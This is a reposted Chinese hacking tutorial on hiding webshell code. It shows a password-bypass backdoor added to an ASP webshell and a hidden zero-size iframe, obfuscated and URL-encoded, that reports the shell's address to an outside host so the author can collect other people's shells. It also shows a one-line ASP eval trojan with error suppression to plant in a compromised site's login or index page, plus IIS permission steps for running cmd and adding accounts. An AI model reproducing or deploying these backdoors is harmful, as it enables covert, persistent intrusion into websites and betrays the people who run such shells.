shell代码的躲藏艺术[网络技术]
本文“shell代码的躲藏艺术[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
大家知道,普通的WebShell里都有密码考证机制,就是说只有Shell的主人可以利用这个Shell,我们本日就拿对比经典的老兵的代码研究一下,代码以下.
if session("webadmin")<>userpass then
//判断密码的精确性
if request.form("pass")<>"" then
//判断能否为空
if request.form("pass")=userpass then
//假如精确
session("webadmin")=userpass
//成立session对象
response.redirect url
//通过考证
else
response.write"考证失利!"
end if
以上的代码就是老兵的考证代码.大家一眼就可以看出来,老兵的Shell利用的是Session考证机制,即假如你输入了精确的密码,那么就赋予你这个session,也就是成立这个Session对象.大家大概会把Session 和Cookies混合了,我在这里简单说一下.
Cookies把客户的信息保存在客户端,只要在Cookies的生存期内,客户的这些信息都存在.而Session是保持一个客户的会话信息,Session数据值存在客户开始利用利用程序到脱离利用程序期间,只要客户脱离利用程序,那么Session的值也就不存在了.
懂得了这些,我们就应当清楚,假如想绕过密码的限制,我们可以这样构造思绪:拜候此中一个特定的页面,不用输入密码就成立Session对象,从而跳过密码考证机制.有了思绪就好办了,在以上的密码考证代码的上面加入以下代码:
if request("p")="p" then
//假如提交的变量是p=p(自己定义的后门)
session("webadmin")=userpass
//直接成立session对象
response.redirect url
//成功绕过密码检测机制
end if
关于request的用法,我就不多说了,大家参照从前的杂志便可.
目前我们已能成功跳过密码考证了,但我们还需求知道WebShell的地址才行.我想了个办法,通过流量统计系统.比方大家知道的5.la,把统计代码插入到Shell中.嵌入代码也要成立一个躲藏的思惟,比方“ <iframe src=http://www.5ihacker.com.cn width=0 height=0></iframe>”,我们可以把地址转换为“%77%77%77%2E5%69%68%61%63%6B%65%72%2E%63%6F%6D%2E%63%6E”,之后用以下的方法来构造语句.
<%
p1="<IFr"
p2=” AmE sr”
p3="c=HTT"
p4="P:// %77%77%77%2E5%69%68"
P5="%61%63%6B%65%72%2E"
P6="%63%6F%6D%2E%63%6E"
P7" width=0 heigh"
P8"t=0></IFrAmE>"
response.write(p1&p2&p3&p4&p5&p6&p7p8)
%>
大家也可以按照自己的爱好,把代码举行更深一层次的打乱,并插入到脚本文件的各个地方,从而起到一个更好的拐骗效果.认为怎么样?是不是比其他的办法躲藏得更深?用这样的办法可以躲过很多人的视野,思维是活的,大家可以随便施展.
最后再对其举行整体加密,当有高人拿到WebShell并且拜候了这个Shell后,那么这个WebShell地址就会被统计,你要做的就是按期去收Shell!
不易发觉的危险
这种躲藏方法实用于你入侵完网站之后,再给自己留一个后门.这里用到的是一句话木马,我很喜好用它,是因为它玲珑干练.比方我们可以在入侵网站拿到了WebShell之后,由于WebShell体积宏大,经过细心的管理员细心查找,以及杀毒软件的查杀,普通城市被发现排除.所以,我们应当防患于未然,比方在/admin/login.asp,乃至也可以在/index.asp里插入一句话:<%execute request("value")%>.不过直接这样做,页面会提醒脚本错误,我们为了躲藏,加入如容错语句<% On Error Resume Next %>,即组合成:<% On Error Resume Next %><%execute request("value")%>,这样这个页面就被我们神不知鬼不觉地留下了后门.假如我们的WebShell被删了今后,直接用一句话木马的衔接端衔接上去便可以了.
这样做的好处是,代码体积小,插入到一个脚本文件中,很难被发现.大家可以开动头脑,对代码举行变形,进一步地起到躲藏效果.
小Shell中的大权限
假如你拿到了服务器的系统权限,也就是你登入了3389终端今后,通过IIS设置,给你的muma.asp(也就是你的后门脚本文件)赐与最大的权限,假如你的3389帐户被管理员发现了,大概是其他缘由帐号登录不了3389终端了的话,便可以利用这个muma.asp履行cmd号令到达增添帐户的目的.通过IIS设置权限的办法,从前提过,我这里就不反复了,大家可以参考从前的杂志.
其实躲藏的艺术还有很多,我只说了冰山一角,剩下的就留给大家在此后的学习中渐渐发掘领会,渐渐品味躲藏的艺术吧
以上是“shell代码的躲藏艺术[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |